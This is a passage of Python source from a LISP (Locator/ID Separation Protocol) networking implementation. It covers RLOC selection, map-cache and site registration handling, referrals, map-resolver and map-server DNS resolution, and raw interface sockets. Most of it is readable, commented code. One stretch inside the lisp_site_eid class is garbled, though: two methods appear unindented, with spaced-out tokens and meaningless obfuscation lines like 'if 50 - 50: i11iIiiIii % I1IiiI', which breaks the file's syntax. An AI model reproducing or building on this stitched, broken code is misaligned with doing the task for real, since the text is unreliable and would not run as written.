        for rloc in self.rloc_set:
            if (rloc.priority <= best_priority):
                if (rloc.unreach_state() and rloc.last_rloc_probe == None):
                    rloc.last_rloc_probe = lisp_get_timestamp()
                self.best_rloc_set.append(rloc)

        #
        # Remove RLOCs that fell out of the best set from the probe list,
        # then add the new members.
        #
        for rloc in old_best:
            if (rloc.priority < best_priority): continue
            rloc.delete_from_rloc_probe_list(self.eid, self.group)

        for rloc in self.best_rloc_set:
            if (rloc.rloc.is_null()): continue
            rloc.add_to_rloc_probe_list(self.eid, self.group)
    def select_rloc(self, lisp_packet, ipc_socket):
        packet = lisp_packet.packet
        version = lisp_packet.inner_version
        rloc_count = len(self.best_rloc_set)
        if (rloc_count == 0):
            self.stats.increment(len(packet))
            return ([None, None, None, self.action, None, None])

        #
        # Hash the inner addresses (plus ports when load-splitting pings)
        # to pick an index into the best-RLOC set.
        #
        extra = 4 if lisp_load_split_pings else 0
        hashval = lisp_packet.hash_ports()
        if (version == 4):
            for i in range(8 + extra):
                hashval = hashval ^ struct.unpack("B",
                    packet[i + 12:i + 13])[0]
        elif (version == 6):
            for i in range(0, 32 + extra, 4):
                hashval = hashval ^ struct.unpack("I",
                    packet[i + 8:i + 12])[0]
            hashval = (hashval >> 16) + (hashval & 0xffff)
            hashval = (hashval >> 8) + (hashval & 0xff)
        else:
            for i in range(0, 12 + extra, 4):
                hashval = hashval ^ struct.unpack("I", packet[i:i + 4])[0]

        if (lisp_data_plane_logging):
            best = []
            for r in self.best_rloc_set:
                if (r.rloc.is_null()): continue
                best.append([r.rloc.print_address_no_iid(), r.print_state()])
            dprint("Packet hash {}, index {}, best-rloc-list: {}".format(
                hex(hashval), hashval % rloc_count, red(str(best), False)))

        #
        # Select entry from the best-RLOC list.
        #
        rloc = self.best_rloc_set[hashval % rloc_count]

        #
        # Drive the echo-nonce state machine for this RLOC.
        #
        echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
        if (echo_nonce):
            echo_nonce.change_state(rloc)
            if (rloc.no_echoed_nonce_state()):
                echo_nonce.request_nonce_sent = None

        #
        # If the chosen RLOC is not up, scan forward for the next up one;
        # if none is found, rebuild the best-RLOC set and drop the packet.
        #
        if (rloc.up_state() == False):
            start = hashval % rloc_count
            index = (start + 1) % rloc_count
            while (index != start):
                rloc = self.best_rloc_set[index]
                if (rloc.up_state()): break
                index = (index + 1) % rloc_count
            if (index == start):
                self.build_best_rloc_set()
                return ([None, None, None, None, None, None])

        rloc.stats.increment(len(packet))

        #
        # Return an RLE, an ELP, or a plain RLOC, in that preference order.
        #
        if (rloc.rle_name and rloc.rle == None):
            if (rloc.rle_name in lisp_rle_list):
                rloc.rle = lisp_rle_list[rloc.rle_name]
        if (rloc.rle): return ([None, None, None, None, rloc.rle, None])

        if (rloc.elp and rloc.elp.use_elp_node):
            return ([rloc.elp.use_elp_node.address, None, None, None, None,
                None])

        rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
        port = rloc.translated_port
        action = self.action if (rloc_addr == None) else None

        #
        # Request a nonce to be echoed, or echo one, if configured.
        #
        nonce = None
        if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
            nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket,
                rloc_addr)

        return ([rloc_addr, port, nonce, action, None, rloc])
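    #
    # Note on the hash in select_rloc() above: the inner source and
    # destination addresses (and ports, when lisp_load_split_pings is set)
    # feed the hash, so packets of one flow stick to one RLOC while
    # different flows spread across the best-RLOC set.
    #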
    def do_rloc_sets_match(self, rloc_address_set):
        if (len(self.rloc_set) != len(rloc_address_set)): return (False)

        #
        # Every stored RLOC address must appear in the supplied set.
        #
        for stored in self.rloc_set:
            found = False
            for rloc in rloc_address_set:
                if (rloc.is_exact_match(stored.rloc) == False): continue
                found = True
                break
            if (found == False): return (False)
        return (True)

    def get_rloc(self, rloc):
        for stored in self.rloc_set:
            if (rloc.is_exact_match(stored.rloc)): return (stored)
        return (None)

    def get_rloc_by_interface(self, interface):
        for stored in self.rloc_set:
            if (stored.interface == interface): return (stored)
        return (None)
    def add_db(self):
        if (self.group.is_null()):
            lisp_db_for_lookups.add_cache(self.eid, self)
        else:
            db = lisp_db_for_lookups.lookup_cache(self.group, True)
            if (db == None):
                db = lisp_mapping(self.group, self.group, [])
                lisp_db_for_lookups.add_cache(self.group, db)
            db.add_source_entry(self)

    def add_cache(self, do_ipc=True):
        if (self.group.is_null()):
            lisp_map_cache.add_cache(self.eid, self)
            if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
        else:
            mc = lisp_map_cache.lookup_cache(self.group, True)
            if (mc == None):
                mc = lisp_mapping(self.group, self.group, [])
                mc.eid.copy_address(self.group)
                mc.group.copy_address(self.group)
                lisp_map_cache.add_cache(self.group, mc)
            if (self.eid.is_null()): self.eid.make_default_route(mc.group)
            mc.add_source_entry(self)

        if (do_ipc): lisp_write_ipc_map_cache(True, self)
    def delete_cache(self):
        self.delete_rlocs_from_rloc_probe_list()
        lisp_write_ipc_map_cache(False, self)

        if (self.group.is_null()):
            lisp_map_cache.delete_cache(self.eid)
            if (lisp_program_hardware):
                prefix = self.eid.print_prefix_no_iid()
                os.system("ip route delete {}".format(prefix))
        else:
            mc = lisp_map_cache.lookup_cache(self.group, True)
            if (mc == None): return

            source_mc = mc.lookup_source_cache(self.eid, True)
            if (source_mc == None): return

            mc.source_cache.delete_cache(self.eid)
            if (mc.source_cache.cache_size() == 0):
                lisp_map_cache.delete_cache(self.group)
    def add_source_entry(self, source_mc):
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_mc.eid, source_mc)

    def lookup_source_cache(self, source, exact):
        if (self.source_cache == None): return (None)
        return (self.source_cache.lookup_cache(source, exact))

    def dynamic_eid_configured(self):
        return (self.dynamic_eids != None)

    def star_secondary_iid(self, prefix):
        if (self.secondary_iid == None): return (prefix)
        iid = "," + str(self.secondary_iid)
        return (prefix.replace(iid, iid + "*"))

    def increment_decap_stats(self, packet):
        port = packet.udp_dport
        if (port == LISP_DATA_PORT):
            rloc = self.get_rloc(packet.outer_dest)
        else:
            #
            # For NAT-traversal, the packet arrives on a translated port,
            # so find the RLOC carrying one. Initializing rloc to None
            # avoids an unbound name when the rloc-set is empty.
            #
            rloc = None
            for rloc_entry in self.rloc_set:
                rloc = rloc_entry
                if (rloc.translated_port != 0): break

        if (rloc != None): rloc.stats.increment(len(packet.packet))
        self.stats.increment(len(packet.packet))

    def rtrs_in_rloc_set(self):
        for rloc in self.rloc_set:
            if (rloc.is_rtr()): return (True)
        return (False)

    def add_recent_source(self, source):
        self.recent_sources[source.print_address()] = lisp_get_timestamp()
class lisp_dynamic_eid(object):
    def __init__(self):
        self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.interface = None
        self.last_packet = None
        self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT

    def get_timeout(self, interface):
        try:
            intf = lisp_myinterfaces[interface]
            self.timeout = intf.dynamic_eid_timeout
        except:
            self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
class lisp_group_mapping(object):
    def __init__(self, group_name, ms_name, group_prefix, sources,
        rle_addr):
        self.group_name = group_name
        self.group_prefix = group_prefix
        self.use_ms_name = ms_name
        self.sources = sources
        self.rle_address = rle_addr

    def add_group(self):
        lisp_group_mapping_list[self.group_name] = self
def lisp_is_group_more_specific(group_str, group_mapping):
    iid = group_mapping.group_prefix.instance_id
    mask_len = group_mapping.group_prefix.mask_len
    group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
    if (group.is_more_specific(group_mapping.group_prefix)):
        return (mask_len)
    return (-1)
def lisp_lookup_group(group):
    best = None
    for group_mapping in list(lisp_group_mapping_list.values()):
        mask_len = lisp_is_group_more_specific(group, group_mapping)
        if (mask_len == -1): continue
        if (best == None or mask_len > best.group_prefix.mask_len):
            best = group_mapping
    return (best)
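#
# A minimal illustrative sketch (a hypothetical helper, never called by
# this file): lisp_lookup_group() is a longest-match lookup, so with
# group-mappings configured for 224.0.0.0/4 and 224.1.1.0/24, the /24
# entry wins for group "224.1.1.1".
#
def _example_lookup_group_usage():
    gm = lisp_lookup_group("224.1.1.1")
    return (None if gm == None else gm.group_prefix.print_prefix())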
lisp_site_flags = {
    "P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
    "S": "ETR is {}LISP-SEC capable",
    "I": "xTR-ID and site-ID are {}included in Map-Register",
    "T": "Use Map-Register TTL field to timeout registration is {}set",
    "R": "Merging registrations are {}requested",
    "M": "ETR is {}a LISP Mobile-Node",
    "N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
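#
# Example rendering (see lisp_site_eid.print_flags() below): a site that
# requested proxy Map-Replies and included an xTR-ID but set nothing else
# prints as "P-s-I-t-r-m-n"; uppercase means the flag is set, lowercase
# means it is not.
#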
class lisp_site(object):
    def __init__(self):
        self.site_name = ""
        self.description = ""
        self.shutdown = False
        self.auth_sha1_or_sha2 = False
        self.auth_key = {}
        self.encryption_key = None
        self.allowed_prefixes = {}
        self.allowed_prefixes_sorted = []
        self.allowed_rlocs = {}
        self.map_notifies_sent = 0
        self.map_notify_acks_received = 0
class lisp_site_eid(object):
    def __init__(self, site):
        self.site = site
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.first_registered = 0
        self.last_registered = 0
        self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
        self.registered = False
        self.registered_rlocs = []
        self.auth_sha1_or_sha2 = False
        self.individual_registrations = {}
        self.map_registers_received = 0
        self.proxy_reply_requested = False
        self.force_proxy_reply = False
        self.force_nat_proxy_reply = False
        self.force_ttl = None
        self.pitr_proxy_reply_drop = False
        self.proxy_reply_action = ""
        self.lisp_sec_present = False
        self.map_notify_requested = False
        self.mobile_node_requested = False
        self.echo_nonce_capable = False
        self.use_register_ttl_requested = False
        self.merge_register_requested = False
        self.xtr_id_present = False
        self.xtr_id = 0
        self.site_id = 0
        self.accept_more_specifics = False
        self.parent_for_more_specifics = None
        self.dynamic = False
        self.more_specific_registrations = []
        self.source_cache = None
        self.inconsistent_registration = False
        self.policy = None
        self.require_signature = False
        self.encrypt_json = False

    def print_eid_tuple(self):
        return (lisp_print_eid_tuple(self.eid, self.group))
    def print_flags(self, html):
        if (html == False):
            output = "{}-{}-{}-{}-{}-{}-{}".format(
                "P" if self.proxy_reply_requested else "p",
                "S" if self.lisp_sec_present else "s",
                "I" if self.xtr_id_present else "i",
                "T" if self.use_register_ttl_requested else "t",
                "R" if self.merge_register_requested else "r",
                "M" if self.mobile_node_requested else "m",
                "N" if self.map_notify_requested else "n")
        else:
            flags = self.print_flags(False)
            flags = flags.split("-")
            output = ""
            for flag in flags:
                descr = lisp_site_flags[flag.upper()]
                descr = descr.format("" if flag.isupper() else "not ")
                output += lisp_span(flag, descr)
                if (flag.lower() != "n"): output += "-"
        return (output)
    def copy_state_to_parent(self, child):
        self.xtr_id = child.xtr_id
        self.site_id = child.site_id
        self.first_registered = child.first_registered
        self.last_registered = child.last_registered
        self.last_registerer = child.last_registerer
        self.register_ttl = child.register_ttl
        if (self.registered == False):
            self.first_registered = lisp_get_timestamp()
        self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
        self.registered = child.registered
        self.proxy_reply_requested = child.proxy_reply_requested
        self.lisp_sec_present = child.lisp_sec_present
        self.xtr_id_present = child.xtr_id_present
        self.use_register_ttl_requested = child.use_register_ttl_requested
        self.merge_register_requested = child.merge_register_requested
        self.mobile_node_requested = child.mobile_node_requested
        self.map_notify_requested = child.map_notify_requested

    def build_sort_key(self):
        cache = lisp_cache()
        ml, key = cache.build_key(self.eid)
        gkey = ""
        if (self.group.is_null() == False):
            gml, gkey = cache.build_key(self.group)
            gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
        key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
        del (cache)
        return (key)
    def merge_in_site_eid(self, child):
        rle_changed = False
        if (self.group.is_null()):
            self.merge_rlocs_in_site_eid()
        else:
            rle_changed = self.merge_rles_in_site_eid()

        #
        # Copy per-registration state up from the child registration.
        #
        if (child != None):
            self.copy_state_to_parent(child)
            self.map_registers_received += 1
        return (rle_changed)

    def copy_rloc_records(self):
        rloc_records = []
        for rloc_entry in self.registered_rlocs:
            rloc_records.append(copy.deepcopy(rloc_entry))
        return (rloc_records)
    def merge_rlocs_in_site_eid(self):
        self.registered_rlocs = []
        for site_eid in list(self.individual_registrations.values()):
            if (self.site_id != site_eid.site_id): continue
            if (site_eid.registered == False): continue
            self.registered_rlocs += site_eid.copy_rloc_records()

        #
        # Remove duplicate RLOC addresses from the merged list; the
        # membership test uses an explicit flag so a match on the last
        # element is not re-appended.
        #
        rloc_records = []
        for rloc_entry in self.registered_rlocs:
            if (rloc_entry.rloc.is_null() or len(rloc_records) == 0):
                rloc_records.append(rloc_entry)
                continue
            found = False
            for merged in rloc_records:
                if (merged.rloc.is_null()): continue
                if (rloc_entry.rloc.is_exact_match(merged.rloc)):
                    found = True
                    break
            if (found == False): rloc_records.append(rloc_entry)
        self.registered_rlocs = rloc_records

        #
        # If nothing merged, the parent is no longer registered.
        #
        if (len(self.registered_rlocs) == 0): self.registered = False
        return
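    #
    # Example of the merge above (a sketch, not from the source): if two
    # ETRs register RLOC sets [A, B] and [B, C] for the same EID with the
    # same site-id, the merged registered_rlocs is [A, B, C], with the
    # duplicate B dropped by the address-comparison loop.
    #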
    def merge_rles_in_site_eid(self):
        #
        # Remember the current set of RLE node addresses so we can report
        # whether the merge changed anything.
        #
        old_rle = {}
        for rloc_entry in self.registered_rlocs:
            if (rloc_entry.rle == None): continue
            for rle_node in rloc_entry.rle.rle_nodes:
                addr_str = rle_node.address.print_address_no_iid()
                old_rle[addr_str] = rle_node.address
            break

        #
        # Merge RLOCs first, then strip per-registration RLEs from all but
        # the first RLOC entry.
        #
        self.merge_rlocs_in_site_eid()

        new_rloc_list = []
        for rloc_entry in self.registered_rlocs:
            if (self.registered_rlocs.index(rloc_entry) == 0):
                new_rloc_list.append(rloc_entry)
                continue
            if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
        self.registered_rlocs = new_rloc_list

        #
        # Build a merged RLE from all registered individual registrations.
        #
        rle = lisp_rle("")
        new_rle = {}
        rloc_name = None
        for site_eid in list(self.individual_registrations.values()):
            if (site_eid.registered == False): continue
            site_rle = site_eid.registered_rlocs[0].rle
            if (site_rle == None): continue

            rloc_name = site_eid.registered_rlocs[0].rloc_name
            for node in site_rle.rle_nodes:
                addr_str = node.address.print_address_no_iid()
                if (addr_str in new_rle): break

                rle_node = lisp_rle_node()
                rle_node.address.copy_address(node.address)
                rle_node.level = node.level
                rle_node.rloc_name = rloc_name
                rle.rle_nodes.append(rle_node)
                new_rle[addr_str] = node.address

        #
        # Store the merged RLE on the first RLOC entry.
        #
        if (len(rle.rle_nodes) == 0): rle = None
        if (len(self.registered_rlocs) != 0):
            self.registered_rlocs[0].rle = rle
            if (rloc_name): self.registered_rlocs[0].rloc_name = None

        #
        # Report whether the set of RLE nodes changed.
        #
        if (list(old_rle.keys()) == list(new_rle.keys())): return (False)

        lprint("{} {} from {} to {}".format(
            green(self.print_eid_tuple(), False), bold("RLE change", False),
            list(old_rle.keys()), list(new_rle.keys())))
        return (True)
    def add_cache(self):
        if (self.group.is_null()):
            lisp_sites_by_eid.add_cache(self.eid, self)
        else:
            group_site = lisp_sites_by_eid.lookup_cache(self.group, True)
            if (group_site == None):
                group_site = lisp_site_eid(self.site)
                group_site.eid.copy_address(self.group)
                group_site.group.copy_address(self.group)
                lisp_sites_by_eid.add_cache(self.group, group_site)

                #
                # A (*, G) entry created on demand inherits the parent
                # used for accepting more-specific registrations.
                #
                group_site.parent_for_more_specifics = \
                    self.parent_for_more_specifics

            if (self.eid.is_null()):
                self.eid.make_default_route(group_site.group)
            group_site.add_source_entry(self)
    def delete_cache(self):
        if (self.group.is_null()):
            lisp_sites_by_eid.delete_cache(self.eid)
        else:
            group_site = lisp_sites_by_eid.lookup_cache(self.group, True)
            if (group_site == None): return

            site_eid = group_site.lookup_source_cache(self.eid, True)
            if (site_eid == None): return

            if (group_site.source_cache == None): return

            group_site.source_cache.delete_cache(self.eid)
            if (group_site.source_cache.cache_size() == 0):
                lisp_sites_by_eid.delete_cache(self.group)
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
if 50 - 50: i11iIiiIii % I1IiiI * iII111i / Ii1I
if 12 - 12: iII111i / OoO0O00 - II111iiii + Oo0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )

    def is_star_g(self):
        if (self.group.is_null()): return (False)
        return (self.eid.is_exact_match(self.group))

    def eid_record_matches(self, eid_record):
        if (self.eid.is_exact_match(eid_record.eid) == False): return (False)
        if (eid_record.group.is_null()): return (True)
        return (eid_record.group.is_exact_match(self.group))

    def inherit_from_ams_parent(self):

        #
        # Copy policy/config state from the parent entry this more-specific
        # EID-prefix was accepted under.
        #
        parent = self.parent_for_more_specifics
        if (parent == None): return
        self.force_proxy_reply = parent.force_proxy_reply
        self.force_nat_proxy_reply = parent.force_nat_proxy_reply
        self.force_ttl = parent.force_ttl
        self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
        self.proxy_reply_action = parent.proxy_reply_action
        self.echo_nonce_capable = parent.echo_nonce_capable
        self.policy = parent.policy
        self.require_signature = parent.require_signature
        self.encrypt_json = parent.encrypt_json

    def rtrs_in_rloc_set(self):
        for rloc_entry in self.registered_rlocs:
            if (rloc_entry.is_rtr()): return (True)
        return (False)

    def is_rtr_in_rloc_set(self, rtr_rloc):
        for rloc_entry in self.registered_rlocs:
            if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
            if (rloc_entry.is_rtr()): return (True)
        return (False)

    def is_rloc_in_rloc_set(self, rloc):
        for rloc_entry in self.registered_rlocs:

            #
            # Check an RLE's nodes as well as the RLOC address itself.
            #
            if (rloc_entry.rle):
                for rle_node in rloc_entry.rle.rle_nodes:
                    if (rle_node.address.is_exact_match(rloc)): return (True)

            if (rloc_entry.rloc.is_exact_match(rloc)): return (True)
        return (False)

    def do_rloc_sets_match(self, prev_rloc_set):
        if (len(self.registered_rlocs) != len(prev_rloc_set)): return (False)

        #
        # Same size, so the sets match iff every previous RLOC is still in
        # the newly registered set.
        #
        for rloc_entry in prev_rloc_set:
            rloc = rloc_entry.rloc
            if (self.is_rloc_in_rloc_set(rloc) == False): return (False)
        return (True)
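
# Editor's sketch (not from the original source): do_rloc_sets_match() uses a
# two-step "same length, then membership" test. With hypothetical plain
# strings the same logic is:
#
#   def rloc_sets_match(new_set, old_set):
#       if (len(new_set) != len(old_set)): return (False)
#       return (all(rloc in new_set for rloc in old_set))
#
# which equals set(new_set) == set(old_set) when neither list has duplicates.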

class lisp_mr(object):
    def __init__(self, addr_str, dns_name, mr_name):
        self.mr_name = mr_name if (mr_name != None) else "all"
        self.dns_name = dns_name
        self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        self.a_record_index = 0
        if (addr_str):
            self.map_resolver.store_address(addr_str)
            self.insert_mr()
        else:
            self.resolve_dns_name()

        self.last_used = 0
        self.last_reply = 0
        self.last_nonce = 0
        self.map_requests_sent = 0
        self.neg_map_replies_received = 0
        self.total_rtt = 0

    def resolve_dns_name(self):
        if (self.dns_name == None): return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30): return

        try:
            lookup = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = lookup[2]
        except:
            return

        #
        # If the A-record this entry tracks no longer exists, remove the
        # map-resolver entry.
        #
        if (len(a_records) <= self.a_record_index):
            self.delete_mr()
            return

        #
        # If the tracked A-record changed address, re-key the entry.
        #
        addr_str = a_records[self.a_record_index]
        if (addr_str != self.map_resolver.print_address_no_iid()):
            self.delete_mr()
            self.map_resolver.store_address(addr_str)
            self.insert_mr()

        #
        # For a LISP-Decent DNS suffix, the first entry creates one lisp_mr()
        # per additional A-record returned for the same DNS name.
        #
        if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
        if (self.a_record_index != 0): return

        for addr_str in a_records[1::]:
            address = lisp_address(LISP_AFI_NONE, addr_str, 0, 0)
            mr = lisp_get_map_resolver(address, None)
            if (mr != None and mr.a_record_index == a_records.index(addr_str)):
                continue

            mr = lisp_mr(addr_str, None, None)
            mr.a_record_index = a_records.index(addr_str)
            mr.dns_name = self.dns_name
            mr.last_dns_resolve = lisp_get_timestamp()

        #
        # Remove map-resolvers whose addresses are no longer in the A-record
        # set returned for this DNS name.
        #
        delete_list = []
        for mr in list(lisp_map_resolvers_list.values()):
            if (self.dns_name != mr.dns_name): continue
            address = mr.map_resolver.print_address_no_iid()
            if (address in a_records): continue
            delete_list.append(mr)

        for mr in delete_list: mr.delete_mr()
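
# Editor's sketch (not from the original source): the A-record handling above
# can be exercised with the standard library alone; the host name here is
# hypothetical.
#
#   import socket
#   name, aliases, a_records = socket.gethostbyname_ex("mr.example.net")
#   for index, addr_str in enumerate(a_records):
#       print(index, addr_str)   # one lisp_mr() entry would track each index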

    def insert_mr(self):
        key = self.mr_name + self.map_resolver.print_address()
        lisp_map_resolvers_list[key] = self

    def delete_mr(self):
        key = self.mr_name + self.map_resolver.print_address()
        if (key not in lisp_map_resolvers_list): return
        lisp_map_resolvers_list.pop(key)

class lisp_ddt_root(object):
    def __init__(self):
        self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.priority = 0
        self.weight = 0

class lisp_referral(object):
    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.referral_set = {}
        self.referral_type = LISP_DDT_ACTION_NULL
        self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.referral_ttl = 0
        self.uptime = lisp_get_timestamp()
        self.expires = 0
        self.source_cache = None

    def print_referral(self, eid_indent, referral_indent):
        uts = lisp_print_elapsed(self.uptime)
        ets = lisp_print_future(self.expires)
        lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:".format(
            eid_indent, green(self.eid.print_prefix(), False), uts, ets,
            len(self.referral_set)))

        for ref_node in list(self.referral_set.values()):
            ref_node.print_ref_node(referral_indent)

    def print_referral_type(self):
        if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return ("root")
        if (self.referral_type == LISP_DDT_ACTION_NULL):
            return ("null-referral")

        if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
            return ("no-site-action")

        if (self.referral_type > LISP_DDT_ACTION_MAX):
            return ("invalid-action")

        return (lisp_map_referral_action_string[self.referral_type])

    def print_eid_tuple(self):
        return (lisp_print_eid_tuple(self.eid, self.group))

    def print_ttl(self):
        ttl = self.referral_ttl
        if (ttl < 60): return (str(ttl) + " secs")

        if ((ttl % 60) == 0):
            ttl = str(old_div(ttl, 60)) + " mins"
        else:
            ttl = str(ttl) + " secs"
        return (ttl)

    def is_referral_negative(self):
        return (self.referral_type in (LISP_DDT_ACTION_MS_NOT_REG,
            LISP_DDT_ACTION_DELEGATION_HOLE, LISP_DDT_ACTION_NOT_AUTH))

    def add_cache(self):
        if (self.group.is_null()):
            lisp_referral_cache.add_cache(self.eid, self)
        else:

            #
            # (S,G) referrals are cached under a (*,G) entry keyed by group.
            #
            ref = lisp_referral_cache.lookup_cache(self.group, True)
            if (ref == None):
                ref = lisp_referral()
                ref.eid.copy_address(self.group)
                ref.group.copy_address(self.group)
                lisp_referral_cache.add_cache(self.group, ref)

            if (self.eid.is_null()): self.eid.make_default_route(ref.group)
            ref.add_source_entry(self)

    def delete_cache(self):
        if (self.group.is_null()):
            lisp_referral_cache.delete_cache(self.eid)
        else:
            ref = lisp_referral_cache.lookup_cache(self.group, True)
            if (ref == None): return

            source_ref = ref.lookup_source_cache(self.eid, True)
            if (source_ref == None): return

            ref.source_cache.delete_cache(self.eid)
            if (ref.source_cache.cache_size() == 0):
                lisp_referral_cache.delete_cache(self.group)

    def add_source_entry(self, source_ref):
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ref.eid, source_ref)

    def lookup_source_cache(self, source, exact):
        if (self.source_cache == None): return (None)
        return (self.source_cache.lookup_cache(source, exact))

class lisp_referral_node(object):
    def __init__(self):
        self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.priority = 0
        self.weight = 0
        self.updown = True
        self.map_requests_sent = 0
        self.no_responses = 0
        self.uptime = lisp_get_timestamp()

    def print_ref_node(self, indent):
        ts = lisp_print_elapsed(self.uptime)
        lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format(
            indent, red(self.referral_address.print_address(), False), ts,
            "up" if self.updown else "down", self.priority, self.weight))

class lisp_ms(object):
    def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
        mr, rr, wmn, site_id, ekey_id, ekey):
        self.ms_name = ms_name if (ms_name != None) else "all"
        self.dns_name = dns_name
        self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        self.a_record_index = 0

        #
        # All map-servers share one xtr-id; reuse the first entry's value.
        #
        if (lisp_map_servers_list == {}):
            self.xtr_id = lisp_get_control_nonce()
        else:
            self.xtr_id = list(lisp_map_servers_list.values())[0].xtr_id

        self.alg_id = alg_id
        self.key_id = key_id
        self.password = pw
        self.proxy_reply = pr
        self.merge_registrations = mr
        self.refresh_registrations = rr
        self.want_map_notify = wmn
        self.site_id = site_id
        self.map_registers_sent = 0
        self.map_registers_multicast_sent = 0
        self.map_notifies_received = 0
        self.map_notify_acks_sent = 0
        self.ekey_id = ekey_id
        self.ekey = ekey
        if (addr_str):
            self.map_server.store_address(addr_str)
            self.insert_ms()
        else:
            self.resolve_dns_name()

    def resolve_dns_name(self):
        if (self.dns_name == None): return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30): return

        try:
            lookup = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = lookup[2]
        except:
            return

        #
        # If the A-record this entry tracks no longer exists, remove the
        # map-server entry.
        #
        if (len(a_records) <= self.a_record_index):
            self.delete_ms()
            return

        #
        # If the tracked A-record changed address, re-key the entry.
        #
        addr_str = a_records[self.a_record_index]
        if (addr_str != self.map_server.print_address_no_iid()):
            self.delete_ms()
            self.map_server.store_address(addr_str)
            self.insert_ms()

        #
        # For a LISP-Decent DNS suffix, the first entry creates one lisp_ms()
        # per additional A-record returned for the same DNS name.
        #
        if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
        if (self.a_record_index != 0): return

        for addr_str in a_records[1::]:
            address = lisp_address(LISP_AFI_NONE, addr_str, 0, 0)
            ms = lisp_get_map_server(address)
            if (ms != None and ms.a_record_index == a_records.index(addr_str)):
                continue

            ms = copy.deepcopy(self)
            ms.map_server.store_address(addr_str)
            ms.a_record_index = a_records.index(addr_str)
            ms.last_dns_resolve = lisp_get_timestamp()
            ms.insert_ms()

        #
        # Remove map-servers whose addresses are no longer in the A-record
        # set returned for this DNS name.
        #
        delete_list = []
        for ms in list(lisp_map_servers_list.values()):
            if (self.dns_name != ms.dns_name): continue
            address = ms.map_server.print_address_no_iid()
            if (address in a_records): continue
            delete_list.append(ms)

        for ms in delete_list: ms.delete_ms()

    def insert_ms(self):
        key = self.ms_name + self.map_server.print_address()
        lisp_map_servers_list[key] = self

    def delete_ms(self):
        key = self.ms_name + self.map_server.print_address()
        if (key not in lisp_map_servers_list): return
        lisp_map_servers_list.pop(key)

class lisp_interface(object):
    def __init__(self, device):
        self.interface_name = ""
        self.device = device
        self.instance_id = None
        self.bridge_socket = None
        self.raw_socket = None
        self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.dynamic_eid_device = None
        self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
        self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)

    def add_interface(self):
        lisp_myinterfaces[self.device] = self

    def get_instance_id(self):
        return (self.instance_id)

    def get_socket(self):
        return (self.raw_socket)

    def get_bridge_socket(self):
        return (self.bridge_socket)

    def does_dynamic_eid_match(self, eid):
        if (self.dynamic_eid.is_null()): return (False)
        return (eid.is_more_specific(self.dynamic_eid))

    def set_socket(self, device):
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW,
            socket.IPPROTO_RAW)
        sock.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
        try:
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
        except:
            sock.close()
            sock = None
        self.raw_socket = sock

    def set_bridge_socket(self, device):
        sock = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
        try:

            #
            # socket.bind() returns None, so bind first and then store the
            # socket object itself.
            #
            sock.bind((device, 0))
            self.bridge_socket = sock
        except:
            return
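
# Editor's note (not from the original source): SO_BINDTODEVICE requires
# root privileges, and on Python 3 the option value must be bytes. A
# standalone sketch with a hypothetical interface name:
#
#   import socket
#   s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
#   s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#   s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, b"eth0")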

class lisp_datetime(object):
